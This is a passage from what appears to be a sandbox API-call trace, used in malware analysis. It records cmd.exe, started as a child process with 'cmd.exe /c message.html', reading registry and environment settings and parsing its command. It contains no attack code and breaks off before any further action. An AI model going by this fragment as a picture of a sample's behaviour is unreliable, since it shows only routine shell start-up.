= "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1224" cmd_line = "\"cmd.exe\" /c message.html" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x2c8 [0189.887] GetModuleHandleA (lpModuleName=0x0) returned 0xed0000 [0189.887] __set_app_type (_Type=0x1) [0189.887] __p__fmode () returned 0x74ff3c14 [0189.887] __p__commode () returned 0x74ff49ec [0189.888] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xee6fd0) returned 0x0 [0190.156] __getmainargs (in: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac, _DoWildCard=0, _StartInfo=0xefd1b8 | out: _Argc=0xefd1a4, _Argv=0xefd1a8, _Env=0xefd1ac) returned 0 [0190.156] _onexit (_Func=0xee8030) returned 0xee8030 [0190.157] _onexit (_Func=0xee8040) returned 0xee8040 [0190.157] _onexit (_Func=0xee8050) returned 0xee8050 [0190.158] _onexit (_Func=0xee8060) returned 0xee8060 [0190.158] _onexit (_Func=0xee8070) returned 0xee8070 [0190.159] _onexit (_Func=0xee8080) returned 0xee8080 [0190.160] GetCurrentThreadId () returned 0x2c8 [0190.160] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x2c8) returned 0xb4 [0190.160] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0190.160] GetProcAddress (hModule=0x73b80000, lpProcName="SetThreadUILanguage") returned 0x73b94f70 [0190.161] SetThreadUILanguage (LangId=0x0) returned 0x280409 [0191.002] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0191.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ffe84 | out: phkResult=0x4ffe84*=0x0) returned 0x2 [0191.003] VirtualQuery (in: lpAddress=0x4ffe8f, lpBuffer=0x4ffe3c, dwLength=0x1c | out: lpBuffer=0x4ffe3c*(BaseAddress=0x4ff000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.003] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x4ffe3c, dwLength=0x1c | out: lpBuffer=0x4ffe3c*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0191.003] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x4ffe3c, dwLength=0x1c | out: lpBuffer=0x4ffe3c*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0191.003] VirtualQuery (in: lpAddress=0x403000, lpBuffer=0x4ffe3c, dwLength=0x1c | out: lpBuffer=0x4ffe3c*(BaseAddress=0x403000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.003] VirtualQuery (in: lpAddress=0x500000, lpBuffer=0x4ffe3c, dwLength=0x1c | out: lpBuffer=0x4ffe3c*(BaseAddress=0x500000, AllocationBase=0x500000, AllocationProtect=0x2, RegionSize=0xc5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0191.003] GetConsoleOutputCP () returned 0x1b5 [0191.797] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0191.798] SetConsoleCtrlHandler (HandlerRoutine=0xef7260, Add=1) returned 1 [0191.799] _get_osfhandle (_FileHandle=1) returned 0x428 [0191.799] GetConsoleMode (in: hConsoleHandle=0x428, lpMode=0xf0388c | out: lpMode=0xf0388c) returned 0 [0191.799] _get_osfhandle (_FileHandle=0) returned 0x8c [0191.799] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03888 | out: lpMode=0xf03888) returned 1 [0192.350] _get_osfhandle (_FileHandle=1) returned 0x428 [0192.350] SetConsoleMode (hConsoleHandle=0x428, dwMode=0x0) returned 0 [0192.350] _get_osfhandle (_FileHandle=1) returned 0x428 [0192.350] GetConsoleMode (in: hConsoleHandle=0x428, lpMode=0xf03890 | out: lpMode=0xf03890) returned 0 [0192.351] _get_osfhandle (_FileHandle=0) returned 0x8c [0192.351] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03894 | out: lpMode=0xf03894) returned 1 [0192.925] _get_osfhandle (_FileHandle=0) returned 0x8c [0192.925] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0193.265] GetEnvironmentStringsW () returned 0x7c4c18* [0193.265] GetProcessHeap () returned 0x7c0000 [0193.265] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xaca) returned 0x7c56f0 [0193.266] FreeEnvironmentStringsA (penv="A") returned 1 [0193.266] GetProcessHeap () returned 0x7c0000 [0193.266] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4) returned 0x7c46d0 [0193.266] GetEnvironmentStringsW () returned 0x7c4c18* [0193.266] GetProcessHeap () returned 0x7c0000 [0193.266] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xaca) returned 0x7c61c8 [0193.266] FreeEnvironmentStringsA (penv="A") returned 1 [0193.266] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fede0 | out: phkResult=0x4fede0*=0xc4) returned 0x0 [0193.267] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x0, lpData=0x4fedec*=0x0, lpcbData=0x4fede4*=0x1000) returned 0x2 [0193.267] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x1, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.267] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x0, lpData=0x4fedec*=0x1, lpcbData=0x4fede4*=0x1000) returned 0x2 [0193.267] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x0, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.267] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x40, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.267] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x40, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.267] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x0, lpData=0x4fedec*=0x40, lpcbData=0x4fede4*=0x1000) returned 0x2 [0193.267] RegCloseKey (hKey=0xc4) returned 0x0 [0193.268] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fede0 | out: phkResult=0x4fede0*=0xc4) returned 0x0 [0193.268] RegQueryValueExW (in: hKey=0xc4, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x0, lpData=0x4fedec*=0x40, lpcbData=0x4fede4*=0x1000) returned 0x2 [0193.268] RegQueryValueExW (in: hKey=0xc4, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x1, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.268] RegQueryValueExW (in: hKey=0xc4, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x0, lpData=0x4fedec*=0x1, lpcbData=0x4fede4*=0x1000) returned 0x2 [0193.268] RegQueryValueExW (in: hKey=0xc4, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x0, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.268] RegQueryValueExW (in: hKey=0xc4, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x9, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.268] RegQueryValueExW (in: hKey=0xc4, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x4, lpData=0x4fedec*=0x9, lpcbData=0x4fede4*=0x4) returned 0x0 [0193.269] RegQueryValueExW (in: hKey=0xc4, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fede8, lpData=0x4fedec, lpcbData=0x4fede4*=0x1000 | out: lpType=0x4fede8*=0x0, lpData=0x4fedec*=0x9, lpcbData=0x4fede4*=0x1000) returned 0x2 [0193.269] RegCloseKey (hKey=0xc4) returned 0x0 [0193.269] time (in: timer=0x0 | out: timer=0x0) returned 0x5e578f6c [0193.269] srand (_Seed=0x5e578f6c) [0193.269] GetCommandLineW () returned="\"cmd.exe\" /c message.html" [0193.269] malloc (_Size=0x4000) returned 0xa521f0 [0193.270] GetCommandLineW () returned="\"cmd.exe\" /c message.html" [0193.271] malloc (_Size=0xffce) returned 0x8c0048 [0193.272] ??_V@YAXPAX@Z () returned 0x4ffdc4 [0193.273] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x8c0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0193.273] malloc (_Size=0xffce) returned 0x8d0020 [0193.274] ??_V@YAXPAX@Z () returned 0x4ffb98 [0193.275] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8d0020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0193.275] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0193.275] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.276] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.276] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0193.276] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0193.276] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0193.276] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0193.276] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0193.276] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0193.276] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0193.276] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0193.277] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0193.277] GetProcessHeap () returned 0x7c0000 [0193.277] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c56f0) returned 1 [0193.277] GetEnvironmentStringsW () returned 0x7c4c18* [0193.277] GetProcessHeap () returned 0x7c0000 [0193.277] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xae2) returned 0x7c7790 [0193.278] FreeEnvironmentStringsA (penv="A") returned 1 [0193.278] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0193.278] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.278] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0193.278] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0193.278] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0193.278] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0193.278] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0193.278] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0193.278] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0193.278] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0193.279] malloc (_Size=0xffce) returned 0x8dfff8 [0193.279] ??_V@YAXPAX@Z () returned 0x4ff930 [0193.280] GetProcessHeap () returned 0x7c0000 [0193.280] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x38) returned 0x7c4768 [0193.280] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x8dfff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0193.281] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x8dfff8, lpFilePart=0x4ff97c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x4ff97c*="Desktop") returned 0x17 [0193.282] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0193.282] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4ff700 | out: lpFindFileData=0x4ff700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7c47a8 [0193.283] FindClose (in: hFindFile=0x7c47a8 | out: hFindFile=0x7c47a8) returned 1 [0193.283] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x4ff700 | out: lpFindFileData=0x4ff700*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x7c47a8 [0193.283] FindClose (in: hFindFile=0x7c47a8 | out: hFindFile=0x7c47a8) returned 1 [0193.283] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x4ff700 | out: lpFindFileData=0x4ff700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x60904d03, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7c47a8 [0193.284] FindClose (in: hFindFile=0x7c47a8 | out: hFindFile=0x7c47a8) returned 1 [0193.284] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0193.284] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0193.284] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0193.284] GetProcessHeap () returned 0x7c0000 [0193.284] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c7790) returned 1 [0193.284] GetEnvironmentStringsW () returned 0x7c4c18* [0193.284] GetProcessHeap () returned 0x7c0000 [0193.285] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb1a) returned 0x7c6ca0 [0193.285] FreeEnvironmentStringsA (penv="=") returned 1 [0193.285] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x8c0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0193.285] GetProcessHeap () returned 0x7c0000 [0193.285] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c4768) returned 1 [0193.285] ??_V@YAXPAX@Z () returned 0x1 [0193.285] ??_V@YAXPAX@Z () returned 0x1 [0193.285] GetProcessHeap () returned 0x7c0000 [0193.285] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400e) returned 0x7c8da8 [0193.286] GetProcessHeap () returned 0x7c0000 [0193.286] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x26) returned 0x7c4768 [0193.286] GetProcessHeap () returned 0x7c0000 [0193.286] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c8da8) returned 1 [0193.286] GetConsoleOutputCP () returned 0x1b5 [0193.812] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0193.812] GetUserDefaultLCID () returned 0x409 [0193.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xeff82c, cchData=8 | out: lpLCData=":") returned 2 [0193.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4ffcec, cchData=128 | out: lpLCData="0") returned 2 [0193.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4ffcec, cchData=128 | out: lpLCData="0") returned 2 [0193.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4ffcec, cchData=128 | out: lpLCData="1") returned 2 [0193.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xeff81c, cchData=8 | out: lpLCData="/") returned 2 [0193.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xeff7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xeff778, cchData=32 | out: lpLCData="Tue") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xeff738, cchData=32 | out: lpLCData="Wed") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xeff6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xeff6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xeff678, cchData=32 | out: lpLCData="Sat") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xeff638, cchData=32 | out: lpLCData="Sun") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xeff80c, cchData=8 | out: lpLCData=".") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xeff7f8, cchData=8 | out: lpLCData=",") returned 2 [0193.815] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0193.820] GetProcessHeap () returned 0x7c0000 [0193.820] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x20c) returned 0x7c77c8 [0193.820] GetConsoleTitleW (in: lpConsoleTitle=0x7c77c8, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0194.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0194.312] GetProcAddress (hModule=0x73b80000, lpProcName="CopyFileExW") returned 0x73b94330 [0194.312] GetProcAddress (hModule=0x73b80000, lpProcName="IsDebuggerPresent") returned 0x73b95930 [0194.312] GetProcAddress (hModule=0x73b80000, lpProcName="SetConsoleInputExeNameW") returned 0x74eb09d0 [0194.312] ??_V@YAXPAX@Z () returned 0x1 [0194.314] GetProcessHeap () returned 0x7c0000 [0194.314] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400a) returned 0x7c8da8 [0194.314] GetProcessHeap () returned 0x7c0000 [0194.314] RtlFreeHeap (HeapHandle=0x7c0000, Flags=0x0, BaseAddress=0x7c8da8) returned 1 [0194.316] _wcsicmp (_String1="message.html", _String2=")") returned 68 [0194.317] _wcsicmp (_String1="FOR", _String2="message.html") returned -7 [0194.317] _wcsicmp (_String1="FOR/?", _String2="message.html") returned -7 [0194.317] _wcsicmp (_String1="IF", _String2="message.html") returned -4 [0194.317] _wcsicmp (_String1="IF/?", _String2="message.html") returned -4 [0194.317] _wcsicmp (_String1="REM", _String2="message.html") returned 5 [0194.317] _wcsicmp (_String1="REM/?", _String2="message.html") returned 5 [0194.317] GetProcessHeap () returned 0x7c0000 [0194.317] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x58) returned 0x7c79e0 [0194.317] GetProcessHeap () returned 0x7c0000 [0194.317] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x22) returned 0x7c47e0 [0194.319] GetConsoleTitleW (in: lpConsoleTitle=0x4ffbe0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0194.843] malloc (_Size=0xffce) returned 0x8d2600 [0194.844] ??_V@YAXPAX@Z () returned 0x4ff96c [0194.845] malloc (_Size=0xffce) returned 0x8e25d8 [0194.846] ??_V@YAXPAX@Z () returned 0x4ff724 [0194.849] GetFileAttributesW (lpFileName="message.html" (normalized: "c:\\users\\fd1hvy\\desktop\\message.html")) returned 0xffffffff [0194.849] _wcsicmp (_String1="message", _String2="DIR") returned 9 [0194.849] _wcsicmp (_String1="message", _String2="ERASE") returned 8 [0194.849] _wcsicmp (_String1="message", _String2="DEL") returned 9 [0194.849] _wcsicmp (_String1="message", _String2="TYPE") returned -7 [0194.849] _wcsicmp (_String1="message", _String2="COPY") returned 10 [0194.850] _wcsicmp (_String1="message", _String2="CD") returned 10 [0194.850] _wcsicmp (_String1="message", _String2="CHDIR") returned 10 [0194.850] _wcsicmp (_String1="message", _String2="RENAME") returned -5 [0194.850] _wcsicmp (_String1="message", _String2="REN") returned -5 [0194.850] _wcsicmp (_String1="message", _String2="ECHO") returned 8 [0194.850] _wcsicmp (_String1="message", _String2="SET") returned -6 [0194.850] _wcsicmp (_String1="message", _String2="PAUSE") returned -3 [0194.850] _wcsicmp (_String1="message", _String2="DATE") returned 9 [0194.850] _wcsicmp (_String1="message", _String2="TIME") returned -7 [0194.850] _wcsicmp (_String1="message", _String2="PROMPT") returned -3 [0194.850] _wcsicmp (_String1="message", _String2="MD") returned 1 [0194.850] _wcsicmp (_String1="message", _String2="MKDIR") returned -6 [0194.850] _wcsicmp (_String1="message", _String2="RD") returned -5 [0194.851] _wcsicmp (_String1="message", _String2="RMDIR") returned -5 [0194.851] _wcsicmp (_String1="message", _String2="PATH") returned -3 [0194.851] _wcsicmp (_String1="message", _String2="GOTO") returned 6 [0194.851] _wcsicmp (_String1="message", _String2="SHIFT") returned -6 [0194.851] _wcsicmp (_String1="message", _String2="CLS") returned 10 [0194.851] _wcsicmp (_String1="message", _String2="CALL") returned 10 [0194.851] _wcsicmp (_String1="message", _String2="VERIFY") returned -9 [0194.851] _wcsicmp (_String1="message", _String2="VER") returned -9 [0194.851] _wcsicmp (_String1="message", _String2="VOL") returned -9 [0194.851] _wcsicmp (_String1="message", _String2="EXIT") returned 8 [0194.851] _wcsicmp (_String1="message", _String2="SETLOCAL") returned -6 [0194.851] _wcsicmp (_String1="message", _String2="ENDLOCAL") returned 8 [0194.852] _wcsicmp (_String1="message", _String2="TITLE") returned -7 [0194.852] _wcsicmp (_String1="message", _String2="START") returned -6 [0194.852] _wcsicmp (_String1="message", _String2="DPATH") returned 9 [0194.852] _wcsicmp (_String1="message", _String2="KEYS") returned 2 [0194.852] _wcsicmp (_String1="message", _String2="MOVE") returned -10 [0194.852] _wcsicmp (_String1="message", _String2="PUSHD") returned -3 [0194.852] _wcsicmp (_String1="message", _String2="POPD") returned -3 [0194.852] _wcsicmp (_String1="message", _String2="ASSOC") returned 12 [0194.852] _wcsicmp (_String1="message", _String2="FTYPE") returned 7 [0194.852] _wcsicmp (_String1="message", _String2="BREAK") returned 11 [0194.852] _wcsicmp (_String1="message", _String2="COLOR") returned 10 [0194.852] _wcsicmp (_String1="message", _String2="MKLINK") returned -6 [0194.852] _wcsicmp (_String1="message", _String2="DIR") returned 9 [0194.853] _wcsicmp (_String1="message", _String2="ERASE") returned 8 [0194.853] _wcsicmp (_String1="message", _String2="DEL") returned 9 [0194.853] _wcsicmp (_String1="message", _String2="TYPE") returned -7 [0194.853] _wcsicmp (_String1="message", _String2="COPY") returned 10 [0194.853] _wcsicmp (_String1="message", _String2="CD") returned 10 [0194.853] _wcsicmp (_String1="message", _String2="CHDIR") returned 10 [0194.853] _wcsicmp (_String1="message", _String2="RENAME") returned -5 [0194.853] _wcsicmp (_String1="message", _String2="REN") returned -5 [0194.853] _wcsicmp (_String1="message", _String2="ECHO") returned 8 [0194.853] _wcsicmp (_String1="message", _String2="SET") returned -6 [0194.853] _wcsicmp (_String1="message", _String2="PAUSE") returned -3 [0194.853] _wcsicmp (_String1="message", _String2="DATE") returned 9 [0194.853] _wcsicmp (_String1="message", _String2="TIME") returned -7 [0194.853] _wcsicmp (_String1="message", _String2="PROMPT") returned -3 [0194.853] _wcsicmp (_String1="message", _String2="MD") returned 1 [0194.853] _wcsicmp (_String1="message", _String2="MKDIR") returned -6 [0194.853] _wcsicmp (_String1="message", _String2="RD") returned -5 [0194.854] _wcsicmp (_String1="message", _String2="RMDIR") returned -5 [0194.854] _wcsicmp (_String1="message", _String2="PATH") returned -3 [0194.854] _wcsicmp (_String1="message", _String2="GOTO") returned 6 [0194.854] _wcsicmp (_String1="message", _String2="SHIFT") returned -6 [0194.854] _wcsicmp (_String1="message", _String2="CLS") returned 10 [0194.854] _wcsicmp (_String1="message", _String2="CALL") returned 10 [0194.854] _wcsicmp (_String1="message", _String2="VERIFY") returned -9 [0194.854] _wcsicmp (_String1="message", _String2="VER") returned -9 [0194.854] _wcsicmp (_String1="message", _String2="VOL") returned -9 [0194.854] _wcsicmp (_String1="message", _String2="EXIT") returned 8 [0194.854] _wcsicmp (_String1="message", _String2="SETLOCAL") returned -6 [0194.854] _wcsicmp (_String1="message", _String2="ENDLOCAL") returned 8 [0194.855] _wcsicmp (_String1="message", _String2="TITLE") returned -7 [0194.855] _wcsicmp (_String1="message", _String2="START") returned -6 [0194.855] _wcsicmp (_String1="message", _String2="DPATH") returned 9 [0194.855] _wcsicmp (_String1="message", _String2="KEYS") returned 2 [0194.855] _wcsicmp (_String1="message", _String2="MOVE") returned -10 [0194.855] _wcsicmp (_String1="message", _String2="PUSHD") returned -3 [0194.855] 